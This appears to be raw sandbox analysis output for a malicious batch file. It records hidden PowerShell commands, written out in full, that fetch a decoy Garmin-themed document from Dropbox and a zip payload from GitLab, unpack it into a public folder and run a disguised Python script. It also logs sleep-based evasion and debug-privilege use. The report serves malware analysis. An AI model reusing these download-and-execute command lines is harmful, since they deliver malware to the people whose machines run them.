                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB4AFF7047 push esp; retf 12_2_00007FFB4AFF7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B011610 push eax; ret 16_2_00007FFB4B01161D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B012B58 pushad ; ret 16_2_00007FFB4B012B81
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B0E23EC push 8B485F93h; iretd 16_2_00007FFB4B0E23F1

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3042
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6803
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3997
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2245
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6440
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3315
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5659
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 462
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3647
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 467
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4132 Thread sleep count: 3042 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4132 Thread sleep count: 6803 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5056 Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep count: 3997 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760 Thread sleep count: 2245 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892 Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 6440 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 3315 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1936Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 5659 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep count: 462 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 3647 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 467 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 0000000C.00000002.1528813287.0000020CF6475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match, File source: amsi64_3324.amsi.csv, type: OTHER
Source: Yara match, File source: amsi64_5512.amsi.csv, type: OTHER
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp.com 437
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v10.docx')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip', 'c:\users\public\document.zip')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
